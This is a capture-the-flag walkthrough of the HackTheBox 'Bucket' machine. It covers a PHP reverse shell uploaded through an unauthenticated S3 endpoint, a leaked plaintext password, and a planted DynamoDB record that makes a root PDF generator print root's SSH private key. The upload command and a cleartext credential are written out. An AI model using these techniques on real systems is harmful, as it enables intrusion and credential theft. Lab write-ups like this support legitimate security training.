Bucket 10.10.10.212
No technology that's connected to the internet is unhackable. <Abhijit Naskar>
Last updated
No technology that's connected to the internet is unhackable. <Abhijit Naskar>
Last updated
Bucket is a Linux machine from HackTheBox, that is an Amazon Simple Storage Service (Amazon S3) bucket. This machine is required some basic knowledge on Amazon Cloud service, such as the AWS Command Line Interface (AWS CLI) and Database Service (DynamoDB) technique.
After basic enumeration, you would found that the host table should be updated to include two host name bucket.htb and s3.bucket.htb before further enumeration.
After used the web folder enumeration tools - gobuster, health page was found which shown dynamoDB service was set up and run. The tool AWS CLI would be used for enumerating the AWS S3 and the dynamoDB. You would found that no authentication required to enquiry the API. Finally, a database table named "users" was found and listed out three user credentials. It was very useful for later use
The AWS CLI could be used to enumerate the bucket folder structure and upload a reverse shell php file. After obtained the reverse shell, a user account named "roy" was found which could be login by the password found above. Got the user flag.
Logon with this "Roy" account, I found the port 8000 was opened for the localhost connection, which was pointed to the /var/www/bucket-app/. There is a PHP program owned by root, which used to print out a DB value to a PDF file. Making use of this program, the value of "/root/.ssh/id_rsa" SSH Private Key was output.
Using this Private Key ssh connect to the bucket.htb, root privilege was obtained.
130n@calvinlai.com
Target Machine: 10.10.10.212
Attacker Machine: 10.10.14.8
It was found that the service cannot be further enumerated. The port 80 was redirected to bucket.htb. Thus, updated the host table to include it.
Check Website Vulnerability
Check any hidden files/folders of the website
Check the website
Visit the website and read the page source, it was found that the s3.bucket.htb should be included in the host table before further enumeration
Using the gobust to check the http://s3.bucket.htb and http://bucket.htb. It was found that there are three hidden folders under s3.bucket.htb, while nothing special return from http://bucket.htb. I paid more attention to the s3.
When visited the health folder, a dynamodb used by AWS was found in running status
Before starting, install the ASW command-line interface tool, and config
Reviewed the AWS document, we can query the table record using the following command, after "try and error", a table "Users" was identified and the list the value. However, those credentials cannot be login via SSH.
It does not require any login authentication on enquiry the site, I can list the folder structure and even copy the file. Thus, a reserved TCP shell file in PHP format was prepared and upload to the environment.
Using the pentestmonkey, php-reverse-shell, and prepared the return netcat port. Uploading PHP reverse shell to the server using the command "aws --endpoint http://s3.bucket.htb/ s3 cp php-reverse-shell.php s3://adserver"
Note: notice the machine is cleaning itself every 30 seconds, so need faster.
I tried to access my PHP file at http://bucket.htb/php-reverse-shell.php using curl to speed up the process. Finally, I got the reverse shell and start the enumeration again
It was found that the user flag was saved at Roy's home directory (/home/roy) which cannot be accessed by this "www" account. Now, the target is the Roy account.
There was a password list found above during enumerating the DynamoDB, tried to use those password to access the server via ssh. Finally, I got the password of Roy is "n2vM-<_K_Q:.Aa2"
Got the user flag
Using the linPEAS to start the enumeration, it was found that there the server is listerning to some interesting port.... let try it one by one.
The port 8000 returned an HTML page, after further enumeration on the source code, the document root should be the following path: /var/www/bucket-app/index.php
This PHP had the following functions:
It's looking for a POST request with data "get_alerts" (line 17 & 18)
Create a new DynamoDB client (line 28)
'Scan' for a table called alerts, then search for a title with the word "Ransomware"
Prints the data from that table into a PDF using Pd4Cmd
As the enumeration result of above, the "Alert" table does not exist. I am thinking that can I create this "alert" table and insert a record which I want.....
Reference: Amazon DynamoDB Documentation
What value should I add? Read the root.txt (/root/root.txt) directly [ actually, tested, and submitted], but this is not the rules of the game. After googling, we can get the private key for the ssh login to gain the root access rights. Steal root ssh private key (/root/.ssh/id_rsa) is our objective.
Steps:
Execute the command at my Kali machine to create the table
Execute the command at my Kali machine to add a record to the table
Visit the page : curl --data "action=get_alerts"
http://localhost:8000/
SCP the result.pdf file to my Kali machine: scp roy@$bucket.htb://var/www/bucket-app/files/result.pdf ./
The result.pdf: this is the private key of root SSH.
1) Reformat the private cert and chmod to 600 at following: -rw------- 1 root root 2603 Dec 27 11:43 cert.ssh
2) ssh -i cert.ssh root@10.10.10.212
Server misconfiguration is the major problem on this box. The error was found on the AWS S3 setting, that does not apply any authentication control on the service API. It makes the attacker to enquiry the server and upload reserve shellcode easily.
Secondly, a plain text password was saved at the database table that made me gain the initial Foothold.
We shall review the system configuration before deployed to public cloud environment.